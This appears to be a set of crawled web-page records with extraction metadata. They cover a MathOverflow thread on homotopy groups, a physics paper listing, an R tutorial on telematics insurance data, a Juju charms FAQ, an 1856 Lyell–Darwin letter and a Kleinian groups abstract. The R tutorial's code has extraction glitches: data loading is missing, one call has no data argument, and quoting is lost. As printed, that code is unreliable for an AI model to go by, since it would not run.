{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3182368576526642, "perplexity": 1255.1462588285588}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550247483873.51/warc/CC-MAIN-20190217233327-20190218015327-00007.warc.gz"}
http://mathoverflow.net/questions/44094/finiteness-of-higher-homotopy-groups-of-finite-complexes
# Finiteness of higher homotopy groups of finite complexes Throughout, let $X$ be a connected finite CW-complex. Question: If $X$ is of dimension $n$. Is there some integer $n'$ (maybe depending only on $n$), such that all homotopy groups $\pi_k(X)$ for $k \geq n'$ are finite? For the spheres $S^n$, $n'=2n+1$ works by Freudenthal's Suspension Theorem and Serre's result that the stable homotopy groups in that range are finite. More generally, if $\pi_1(X)=0$, then the Milnor-Moore theorem relates the rational homotopy groups to the rational homology of the loop space of $X$ and I believe that this can be used to get a similar conclusion. But what if $\pi_1(X) \neq 0$? EDIT: Igor Belegradek (besides answering the question) pointed out that what I stated in the last three lines is not correct. - Take any CW complex whose 1-connected cover is a sphere... –  David Roberts Oct 29 '10 at 10:26 @David: I could take a sphere. But probably, you had something interesting in mind. What is the relation to the question? –  Andreas Thom Oct 29 '10 at 10:44 A direct example: rationally, the homotopy groups of $S^3 \vee S^3$ form the free (shifted) Lie algebra on two generators under the Whitehead product, and this is nontrivial in every odd degree greater than or equal to 3. –  Tyler Lawson Oct 29 '10 at 11:11 I do not understand the edit. I think my answer is not about the last 3 lines; it is about the highlighted question. Specifically any rationally hyperbolic gives a "no" answer to the highlighed question. –  Igor Belegradek Oct 29 '10 at 13:23 You are right. But in addition, I claimed something for the simply-connected case which is wrong. –  Andreas Thom Oct 29 '10 at 13:47 The answer is no in a very strong way even for simply-connected complexes. In rational homotopy theory there is a famous dichotomy between elliptic and hyperbolic spaces: a simply-connected finite complex is either elliptic or hyperbolic. Elliptic means that all but finitely many homotopy groups are finite. Hyperbolic means that the sum of ranks of first $k$ homotopy groups grows exponentially with $k$. In some sense most spaces are hyperbolic. If I remember correctly, $m$-fold connected sum of $S^2\times S^2$ with itself is hyperbolic if $m>1$. You can read more of this in the book "Rational homotopy theory" by Felix-Halperin-Thomas. You can discover the existence of rationally hyperbolic spaces by yourself. Try to do a rational homotopy calculation of a manifold that it not a homogeneous space, say hypersurfaces in $CP^3$, where you know everything about the real cohomology ring. Moreover, these space are simply-connected and formal; so it looks like an easy exercise. After you filled several pages with generators and differentials, you begin to realize that the computation will not close off as elegantly as in the case of $CP^n$ or $S^n$. As a grad student, I spent a long night doing that -:)) –  Johannes Ebert Oct 29 '10 at 14:31
2015-01-26 12:36:41
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9199704527854919, "perplexity": 296.7583281963303}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-06/segments/1422115862636.1/warc/CC-MAIN-20150124161102-00096-ip-10-180-212-252.ec2.internal.warc.gz"}
https://www.semanticscholar.org/paper/Strong-gravitational-radiation-from-a-simple-dark-Baldes-Garcia-Cely/4aa2d8273c8222381433894249855bb08b1d3010
# Strong gravitational radiation from a simple dark matter model @article{Baldes2019StrongGR, title={Strong gravitational radiation from a simple dark matter model}, author={Iason Baldes and Camilo Garcia-Cely}, journal={Journal of High Energy Physics}, year={2019}, volume={2019}, pages={1-30} } • Published 2019 • Physics • Journal of High Energy Physics A bstractA rather minimal possibility is that dark matter consists of the gauge bosons of a spontaneously broken symmetry. Here we explore the possibility of detecting the gravitational waves produced by the phase transition associated with such breaking. Concretely, we focus on the scenario based on an SU(2)D group and argue that it is a case study for the sensitivity of future gravitational wave observatories to phase transitions associated with dark matter. This is because there are few… Expand #### Paper Mentions Gravitational waves from scale-invariant vector dark matter model: probing below the neutrino-floor We study the gravitational waves (GWs) spectrum produced during the electroweak phase transition in a scale-invariant extension of the Standard Model (SM), enlarged by a dark $$U(1)_{D}$$ U ( 1 ) DExpand Gravitational waves and electroweak baryogenesis in a global study of the extended scalar singlet model • Physics • 2018 A bstractWe perform a global fit of the extended scalar singlet model with a fermionic dark matter (DM) candidate. Using the most up-to-date results from the Planck measured DM relic density, directExpand Gravitational waves as a probe of left-right symmetry breaking • Physics • 2019 Left-right symmetry at high energy scales is a well-motivated extension of the Standard Model. In this paper we consider a typical minimal scenario in which it gets spontaneously broken by scalarExpand Leptophilic dark matter from gauged lepton number: phenomenology and gravitational wave signatures • Physics • 2018 A bstractNew gauge symmetries often appear in theories beyond the Standard Model. Here we study a model where lepton number is promoted to a gauge symmetry. Anomaly cancellation requires theExpand Gravitational waves from conformal symmetry breaking • Physics • 2018 We consider the electroweak phase transition in the conformal extension of the standard model known as SU(2)cSM. Apart from the standard model particles, this model contains an additional scalar andExpand Gravitational Waves from First-Order Phase Transitions: LIGO as a Window to Unexplored Seesaw Scales • Physics • 2018 Within a recently proposed classically conformal model, in which the generation of neutrino masses is linked to spontaneous scale symmetry breaking, we investigate the associated phase transition andExpand A fresh look at the gravitational-wave signal from cosmological phase transitions • Physics • 2019 Many models of physics beyond the Standard Model predict a strong first-order phase transition (SFOPT) in the early Universe that leads to observable gravitational waves (GWs). In this paper, weExpand Gravitational wave signatures from an extended inert doublet dark matter model • Physics • Journal of Cosmology and Astroparticle Physics • 2019 We consider a particle dark matter model by extending the scalar sector of the Standard Model by an additional SU(2) scalar doublet which is made "inert" (and stable) by imposing a discrete $Z_2$Expand Conformal vector dark matter and strongly first-order electroweak phase transition • Physics • 2019 A bstractWe study a conformal version of the Standard Model (SM), which apart from SM sector, containing a UD(1) dark sector with a vector dark matter candidate and a scalar field (scalon). In thisExpand Dark Quark Nuggets. • Physics • 2018 "Dark quark nuggets", a lump of dark quark matter, can be produced in the early universe for a wide range of confining gauge theories and serve as a macroscopic dark matter candidate. The twoExpand #### References SHOWING 1-10 OF 109 REFERENCES Gravitational Waves from a Dark Phase Transition. The gravitational wave signal provides a unique test of the gravitational interactions of a dark sector, and the complementarity with conventional searches for new dark sectors is discussed, as well as symmetric and asymmetric composite dark matter scenarios. Expand Gravitational Wave Signals of Electroweak Phase Transition Triggered by Dark Matter • Physics • 2017 We study in this work a scenario that the universe undergoes a two step phase transition with the first step happened to the dark matter sector and the second step being the transition between theExpand Gravitational Waves from Phase Transitions at the Electroweak Scale and Beyond • Physics • 2007 If there was a first-order phase transition in the early universe, there should be an associated stochastic background of gravitational waves. In this paper, we point out that the characteristicExpand Hearing the signal of dark sectors with gravitational wave detectors • Physics • 2016 Motivated by advanced LIGO (aLIGO)’s recent discovery of gravitational waves, we discuss signatures of new physics that could be seen at ground- and space-based interferometers. We show that aExpand Gravitational waves from conformal symmetry breaking • Physics • 2018 We consider the electroweak phase transition in the conformal extension of the standard model known as SU(2)cSM. Apart from the standard model particles, this model contains an additional scalar andExpand Gravitational wave from dark sector with dark pion • Physics • 2017 In this work, we investigate the spectrums of gravitational waves produced by chiral symmetry breaking in dark quantum chromodynamics (dQCD) sector. The dark pion ($\pi$) can be a dark matterExpand Dark matter stability without new symmetries • Physics • 2014 The stability of dark matter is normally achieved by imposing extra symmetries beyond those of the Standard Model of Particle Physics. In this paper we present a framework where the dark matterExpand Gravitational waves from the asymmetric-dark-matter generating phase transition The baryon asymmetry, together with a dark matter asymmetry, may be produced during a first order phase transition in a generative sector. We study the possibility of a gravitational wave signal in aExpand Super-cool Dark Matter • Physics • 2018 A bstractIn dimension-less theories of dynamical generation of the weak scale, the Universe can undergo a period of low-scale inflation during which all particles are massless and undergoExpand Model for Thermal Relic Dark Matter of Strongly Interacting Massive Particles. • Medicine • Physical review letters • 2015 This work presents explicit classes of strongly coupled gauge theories of dynamical chiral symmetry breaking, where the pions play the role of dark matter, and gives an explicit relationship between the 3→2 annihilation rate and the 2→2 self-scattering rate, which alters predictions for structure formation. Expand
2021-09-25 16:56:58
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.46234363317489624, "perplexity": 1396.2192567784293}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057687.51/warc/CC-MAIN-20210925142524-20210925172524-00472.warc.gz"}
http://egallic.fr/lausanne/HTML/telematics.html
Jean-Philippe Boucher, Université du Québec À Montréal (🐦 @J_P_Boucher) Arthur Charpentier, Université du Québec À Montréal (🐦 @freakonometrics) Ewen Gallic, Aix-Marseille Université (🐦 @3wen) # 1 Data As mention in the course, we will use simulated datasets, based on true data from a private Canadian insurance company (The Co-operators General Insurance Company) for this hands-on session on telematics. Each observation corresponds to an insurance policy for a vehicule and a driver (a vehicule may therefore be insured for multiple drivers). The available variables are as follows: • Falsevin: id of the vehicule • RA_GENDER: gender (1 male, 2 female, 3 unknown) • RA_MARITALSTATUS: marital status (1 married, 0 other) • RA_VEH_USE: vehicule use (1 commute, 2 pleasure, 0 other) • RA_EXPOSURE_TIME: exposure time (in years) • RA_DISTANCE_DRIVEN: total distance traveled by the driver • RA_NBTRIP: number of trips • RA_HOURS_DRIVEN: number of hours driven • RA_ACCIDENT_IND: number of claims The dataset is in CSV format (comma-separated values). It has been separated into a training sample (CanadaPanelTrain.csv, with 29,108 observations) and a test sample (CanadaPanelTest.csv, with 19,570 observations). library(tidyverse) nrow(canada_train) ## [1] 29108 nrow(canada_test) ## [1] 19570 canada_train ## # A tibble: 29,108 x 9 ## Falsevin RA_GENDER RA_MARITALSTATUS RA_VEH_USE RA_EXPOSURE_TIME ## <dbl> <dbl> <dbl> <dbl> <dbl> ## 1 1 2 1 2 0.863 ## 2 1 2 1 2 0.485 ## 3 6 2 1 1 0.329 ## 4 6 2 1 1 0.964 ## 5 6 2 1 1 1.00 ## 6 7 2 0 1 0.573 ## 7 7 2 0 1 0.912 ## 8 8 1 0 2 0.496 ## 9 8 1 0 2 0.501 ## 10 8 1 0 2 0.501 ## # … with 29,098 more rows, and 4 more variables: RA_DISTANCE_DRIVEN <dbl>, ## # RA_NBTRIP <dbl>, RA_HOURS_DRIVEN <dbl>, RA_ACCIDENT_IND <dbl> canada_test ## # A tibble: 19,570 x 9 ## Falsevin RA_GENDER RA_MARITALSTATUS RA_VEH_USE RA_EXPOSURE_TIME ## <dbl> <dbl> <dbl> <dbl> <dbl> ## 1 2 2 0 1 0.496 ## 2 2 2 0 1 0.778 ## 3 3 1 0 2 1.00 ## 4 3 1 0 2 0.414 ## 5 4 2 1 1 0.479 ## 6 4 2 1 1 0.499 ## 7 4 2 1 1 0.414 ## 8 5 1 1 1 0.666 ## 9 5 1 1 1 0.918 ## 10 9 1 1 2 0.392 ## # … with 19,560 more rows, and 4 more variables: RA_DISTANCE_DRIVEN <dbl>, ## # RA_NBTRIP <dbl>, RA_HOURS_DRIVEN <dbl>, RA_ACCIDENT_IND <dbl> ## 1.1 Basic Statistics ### 1.1.1 Numerical Variables While R offers a convenient function to display summary statistics of a dataset, it lacks some outputs of interest, especially variance. Let us create our own summary function: my_summary <- function(x){ results <- tibble(Average = mean(x), Variance = var(x), Minimum = min(x), Maximum = max(x), 25th percentile = quantile(x, probs = 0.25, names = FALSE), 50th percentile = quantile(x, probs = 0.50, names = FALSE), 75th percentile = quantile(x, probs = 0.75, names = FALSE)) } We can then apply this function to some desired columns: summary_var <- c("RA_EXPOSURE_TIME", "RA_NBTRIP", "RA_ACCIDENT_IND") table <- dplyr::select(!!summary_var) %>% # Only keep the desired columns dplyr::select_if(is.numeric) %>% # Makes sure to keep only numeric variables purrr::map(my_summary) %>% # Apply my_summary() to each selected variables dplyr::bind_rows(.id = "variable_name") # bind the rows in a single tibble This table can be displayed in a markdown format. To obtain a prettier output, we can add a label to the variables instead of leaving the name of the variable. To that end, we can create a tibble where the labels can be defined. labels_cols <- tibble( variable_name = c( "Falsevin", "RA_GENDER", "RA_MARITALSTATUS", "RA_VEH_USE", "RA_EXPOSURE_TIME", "RA_DISTANCE_DRIVEN", "RA_NBTRIP", "RA_HOURS_DRIVEN", "RA_ACCIDENT_IND" ), label = c( "ID vehicle", "Gender", "Marital Status", "Vehicle use", "Exposure Time", "Distance Driven", "# Trips", "Hours Driven", "# Claims" ) ) formatted_table <- table %>% # Add the corresponding label to the variables dplyr::left_join(labels_cols) %>% # Put the variable label in first position dplyr::select(label, everything()) %>% # Remove variable_name from the tibble dplyr::select(-variable_name) %>% dplyr::rename(Variable = label) formatted_table ## # A tibble: 3 x 8 ## Variable Average Variance Minimum Maximum 25th percentil… ## <chr> <dbl> <dbl> <dbl> <dbl> <dbl> ## 1 Exposur… 6.52e-1 6.11e-2 0.277 1.08 0.485 ## 2 # Trips 1.07e+3 3.90e+5 15 3283 607 ## 3 # Claims 3.47e-2 3.61e-2 0 3 0 ## # … with 2 more variables: 50th percentile <dbl>, 75th ## # percentile <dbl> The output of the table can be in Markdown: formatted_table %>% knitr::kable( format = "pandoc", digits = 3, format.args = list(big.mark = " ") ) Variable Average Variance Minimum Maximum 25th percentile 50th percentile 75th percentile Exposure Time 0.652 0.061 0.277 1.079 0.485 0.521 0.94 # Trips 1 074.081 390 413.843 15.000 3 283.000 607.000 937.000 1 415.25 # Claims 0.035 0.036 0.000 3.000 0.000 0.000 0.00 A $$\LaTeX$$ format can also be obtained: formatted_table %>% knitr::kable( format = "latex", digits = 3, format.args = list(big.mark = " ") ) %>% cat() ## ## \begin{tabular}{l|r|r|r|r|r|r|r} ## \hline ## Variable & Average & Variance & Minimum & Maximum & 25th percentile & 50th percentile & 75th percentile\\ ## \hline ## Exposure Time & 0.652 & 0.061 & 0.277 & 1.079 & 0.485 & 0.521 & 0.94\\ ## \hline ## \# Trips & 1 074.081 & 390 413.843 & 15.000 & 3 283.000 & 607.000 & 937.000 & 1 415.25\\ ## \hline ## \# Claims & 0.035 & 0.036 & 0.000 & 3.000 & 0.000 & 0.000 & 0.00\\ ## \hline ## \end{tabular} Some scatter plots can be graphes: ggplot(data = canada_train, aes(x = RA_DISTANCE_DRIVEN, y=RA_NBTRIP)) + geom_point(aes(colour = as.factor(RA_ACCIDENT_IND)), alpha = .5) + scale_colour_discrete("# Claims") + labs(x = "Distance Driven", y = "# Trips", title = "# Trips as a function of Distance Driven")`
2020-01-20 04:48:14
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.24436283111572266, "perplexity": 9689.286311491678}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579250597230.18/warc/CC-MAIN-20200120023523-20200120051523-00237.warc.gz"}
https://charmsreactive.readthedocs.io/en/latest/faq.html
## How do I run and debug reactive charm?¶ You run a reactive charm by running a hook in the hooks/ directory. That hook will start the reactive framework and initiate the “cascade of flags”. The hook files in the hooks/ directory are created by layer:basic and by charm build. Make sure to include layer:basic in your layer.yaml file if the hook files aren’t present in the hooks/ directory. Note Changes to flags are reset when a handler crashes. Changes to flags happen immediately, but they are only persisted at the end of a complete and successful run of the reactive framework. All unpersisted changes are discarded when a hook crashes. ## Why doesn’t my Charm do anything? Why are there no hooks in the hooks directory?¶ You probably forgot to include layer-basic in your layer.yaml file. This layer creates the hook files so that the reactive framework starts when a hook runs. ## How can I react to configuration changes?¶ The base layer provides a set of easy flags to react to configuration changes. These flags will be automatically managed when you include layer:basic in your layer.yaml file. ## How to remove a flag immediately when a config changes?¶ You can use triggers for this, see Coupling Flags with Triggers for more info. Example: clear the flag apt.sources_configured immediately when the install_sources config option changes. register_trigger(when='config.changed.install_sources', clear_flag='apt.sources_configured') ## How to run a handler even if the flag it reacts to has since been cleared?¶ Take the following case: @when('service.stopped') def restart_service(): restart_my_service() clear_flag('service.stopped') @when_all('service.stopped', 'endpoint.clients.connected') def notify_related_units(): clients = from_flag('endpoint.clients.connected') clients.notify_service_stopped() The notify_related_units handler will never get invoked because the restart_handler will get invoked first and it removes the service.stopped state. If this is not the desired behavior, if you need to notify the clients even when the service has been restarted by another handler, then you can use a trigger to create a new state specifically for the notify_related_units handler: register_trigger(when='service.stopped', @when('service.stopped') def restart_service(): restart_my_service() clear_flag('service.stopped')
2019-01-21 14:08:25
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.19609865546226501, "perplexity": 4639.271988614169}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-04/segments/1547583792784.64/warc/CC-MAIN-20190121131658-20190121153658-00429.warc.gz"}
http://www.darwinproject.ac.uk/letter/DCP-LETT-1915A.xml
skip to content # From Charles Lyell   [1 July 1856] [DIAGRAM HERE] A F G B D K L C p H q m’ o’ m o “Whether Volcanos are in areas of elevation” ramme Extract of a Letter from C Lyell to C Darwin July 1. 1856—1 Of course it is true, as you well show in your Coral volume, that the active volcanos have recent deposits with marine shells uplifted in them.2 This is the case to some small extent in all the principal Atlantic islands except Palma, which I visited, & Palma has not been thoroughly examined & may somewhere exhibit signs of elevation Comparatively therefore, and by contrast with the Atoll areas, you may represent the volcanic as rising. Still I have always felt a little uncomfortable at being called upon to assume that in recent & pliocene ages volcanic action has been and is connected with the growth of land. Were this the case should we not find that the continents would be the great areas of extinct Pliocene and of active volcanos, and that the latter did not affect sea-side and insular and even mid-ocean sites. If we find active volcanos in Oceanic areas, & few or none of them in the middle of continental areas, it furnishes a primâ facie case in favour of the doctrine that the grand uplifting power acts very independently of the accidental sites of existing superficial outbreaks. An argument might even be raised in support of the theory that active volcanos are more connected with sinking on a great scale however true it may be that locally they tend to upheave as well as to form land by outpouring of lava & of ejectamenta. Maurys last chart of the Atlantic3 makes the Atlantis hypothesis more bold than it appeared when E. Forbes proposed it for the Canaries are separated from Africa & Europe by deep sea depressions of more than 6000 feet & Madeira by depths exceeding 12,000 feet!4 The data, I fear are scanty however. I find in Madeira & the Canaries upraised littoral deposits of the Miocene period, in my sense of Miocene when there was a certain proportion of living species already in being. This, I think, rather increases the difficulty of the continental extension hypothesis. But I want to ask you whether it may not be true that the bed of the Atlantic has been gradually sinking all the while the Canaries & Madeiras have been forming & that very slight local upheaval only has occurred even on the sites of these volcanic islands. I sometimes think I can dispense with all excess even of local upheaval, over & above that of the adjoining deep sea spaces. Thus for example suppose A. B. C. to represent the original Europeo-African continent & B. D. to be the level of the Atlantic.5 A gradual sinking down of 6000 feet takes place in a short part of the Miocene Period, (not occupying possibly above $\frac{1}{2}$ a million of years. The ocean has thus risen relatively to the land up to G. But in the meantime the volcano F. has been gradually built up 7500 ft & is 1500 feet higher above the sea. A pause in the volcanic action takes place during which a subsidence of partial extent under Id. occurs causing F. to lose 1500 feet of its height by slow depression during which every part of the subaerial mass of F. gets submerged & covered or faced with a marine littoral deposit, full of rolled boulders and pebbles with [DIAGRAM HERE] q H p patellæ, & other littoral shells. The subjacent rocks H. all volcanic but as entirely free from marine remains as if exclusively subaerial. We now have the original subterranean layer K. L. bending down at m, n, o. 1500 feet below the general depression of 6000 feet, & if it be then restored to the level m’ o’ we have the volcano H. pushed up again 1500 feet with the marine beds p. q., abutting against the foundation of older subaerial rocks.6 This is what I observed in one part of the Grand Canary. The 4000 or 5000 of additional subaerial volcanic beds may be built up & you have Madeira. In the Grand Canary I suspect most of its height was attained before the submergence of 1500 or (1100? feet. [DIAGRAM HERE] marine beds older subaerial Grand Canary But my reasoning you see is the same as that which I adopted about the Atolls before you invented your theory, namely, that oscillations occurring in a sea filling up with coral or with volcanic matter may cause uplifted marine formations provided subsidence & upheaval be just equal the one to the other.7 Take away all the volcanic matter from Etna, Ischia &c & the marine shells could sink down below the sea level. All the marine beds in the Canaries & Madeiras are volcanic except the corals & shells themselves. If the active volcanos were connected with a continent-making power, we should see secondary and non-volcanic rocks uplifted by them. I do not however want to contend that active & Pliocene volcanos belong to subsiding areas rather than to areas of elevation altho’ half inclined to that alternative in preference to the opposite theory. But surely they are so distributed as that they seem to belong quite as much to Pliocene & recent subsidence as to upheaval during the same period.8 ## Footnotes The letter has not been found. The heading, date, and text given here are taken from Lyell’s scientific journal 2, pp. 82–90 (Kinnordy House MS). It is also printed in Wilson ed. 1970, pp. 110–14. Coral reefs (1842), pp. 140–2, ‘On the absence of active Volcanos in the areas of subsidence, and on their frequent presence in the areas of elevation’. Lyell had queried CD’s suggestion that volcanoes were mostly associated with rising land in his scientific journal 2, p. 74, in an entry dated 30 June 1856 (Wilson ed. 1970, p. 108): There has always seemed to me a difficulty in reconciling two facts in Darwin’s theory of volcanic & Coral areas—namely that Volcanoes are the upheaving power and yet, that nearly all the islands in the middle of great oceans are volcanic, whereas there are not many active, nor an extraordinary number of Tertiary volcanoes in continental areas. Maury 1855a, which Lyell had been studying with reference to the possibility of former land-bridges between Madeira and Africa (see Wilson ed. 1970, pp. 109–10). Lyell had previously noted the correct depth of 1200 feet in his scientific journal 2, p. 80 (Wilson ed. 1970, p. 110). Lyell refers to the first diagram given at the beginning of his extract, dated ‘June 1st.’, in his scientific journal (Wilson ed. 1970, p. 111). Lyell refers to the second diagram given at the beginning of his extract. C. Lyell 1830–3, 2: 283–301. Following the letter, Lyell added: P.S. not sent to Darwin The deepness of the sea round Madeira & Po. So. & other Atlantic Islands is against Volcanos being connected with upheaval for the upraising power wd. tend at least to render the sea shallow shd. it fail to push up dry land in the neighbourhood of oceanic volcanos. July 2d—/56 ## Summary To cast doubt on CD’s view that volcanic action is associated with elevation of land, CL suggests that local oscillations in strata underlying volcanoes could also explain how active volcanoes have uplifted fossil deposits of marine shells. Overall he is more inclined to believe that recent volcanoes belong to areas of subsidence rather than of elevation. ## Letter details Letter no. DCP-LETT-1915A From Charles Lyell (1st baronet) To Charles Robert Darwin Source of text Lord Lyell (private collection) Physical description 9pp ## Please cite as Darwin Correspondence Project, “Letter no. 1915A,” accessed on 22 April 2018, http://www.darwinproject.ac.uk/DCP-LETT-1915A Also published in The Correspondence of Charles Darwin, vol. 6 letter
2018-04-22 08:42:15
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 1, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5764152407646179, "perplexity": 4939.970427234527}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-17/segments/1524125945552.45/warc/CC-MAIN-20180422080558-20180422100558-00638.warc.gz"}
https://www.projecteuclid.org/euclid.gt/1513799570
## Geometry & Topology ### Kleinian groups and the rank problem #### Abstract We prove that the rank problem is decidable in the class of torsion-free word-hyperbolic Kleinian groups. We also show that every group in this class has only finitely many Nielsen equivalence classes of generating sets of a given cardinality. #### Article information Source Geom. Topol., Volume 9, Number 1 (2005), 375-402. Dates Accepted: 28 February 2005 First available in Project Euclid: 20 December 2017 https://projecteuclid.org/euclid.gt/1513799570 Digital Object Identifier doi:10.2140/gt.2005.9.375 Mathematical Reviews number (MathSciNet) MR2140986 Zentralblatt MATH identifier 1087.20035 #### Citation Kapovich, Ilya; Weidmann, Richard. Kleinian groups and the rank problem. Geom. Topol. 9 (2005), no. 1, 375--402. doi:10.2140/gt.2005.9.375. https://projecteuclid.org/euclid.gt/1513799570 #### References • I Agol, Tameness of hyperbolic 3–manifolds. • J Alonso, T Brady, D Cooper, V Ferlini, M Lustig, M Mihalik, M Shapiro, H Short, Notes on hyperbolic groups, from: “Group theory from a geometric viewpoint (Trieste 1990)”, World Scientific, River Edge, NJ (1991) 3–63 • G Arzhantseva, On quasiconvex subgroups of word hyperbolic groups Geom. Dedicata 87 (2001) 191–208 • G Arzhantseva, A Yu Ol'shanskii, Generality of the class of groups in which subgroups with a lesser number of generators are free Mat. Zametki 59 (1996) 489–496, 638 (Russian); translation in Math. Notes 59 (1996) 350–355 • G Baumslag, C F Miller III, H Short, Unsolvable problems about small cancellation and word hyperbolic groups Bull. London Math. Soc. 26 (1994) 97–101 • M Boileau, H Zieschang, Heegaard genus of closed orientable Seifert $3$–manifolds Invent. Math. 76 (1984) 455–468 • D Calegari, D Gabai, Shrinkwrapping and the taming of hyperbolic 3–manifolds. • R Canary, A covering theorem for hyperbolic $3$–manifolds and its applications, Topology 35 (1996) 751–778 • N Dunfield, W P Thurston, The virtual Haken conjecture: Experiments and examples, \gtref7200312399441 • D B A Epstein, J W Cannon, D F Holt, S V F Levy, M S Paterson, W P Thurston, Word processing in groups, Jones and Bartlett Publishers, Boston, MA (1992) • D Gabai, Convergence groups are Fuchsian groups, Ann. of Math. 136 (1992) 447–510 • É Ghys, P de la Harpe (editors), Sur les groupes hyperboliques d'après Mikhael Gromov, Progress in Mathematics 83, Birkhäuser Boston Inc. Boston, MA, USA (1990) • V Gerasimov, Detecting connectedness of the boundary of a hyperbolic group, preprint (1999) • S M Gersten, H Short, Rational subgroups of biautomatic groups, Ann. of Math. 134 (1991) 125–158 • M Gromov, Hyperbolic groups, from: “Essays in group theory” (S M Gersten, editor), Math. Sci. Res. Inst. Publ. 8, Springer–Verlag (1987) 75–263 • W Jaco, H Rubinstein, 0–efficient triangulations of 3–manifolds, J. Differential Geom. 65 (2003) 61–168 • K Johannson, Topology and combinatorics of 3–manifolds, Lecture Notes in Mathematics 1599, Springer–Verlag, Berlin, Germany (1995) • I Kapovich, Detecting quasiconvexity: algorithmic aspects, from: “Geometric and computational perspectives on infinite groups (Minneapolis, MN and New Brunswick, NJ, 1994)”, DIMACS Ser. Discrete Math. Theoret. Comput. Sci. 25, Amer. Math. Soc., 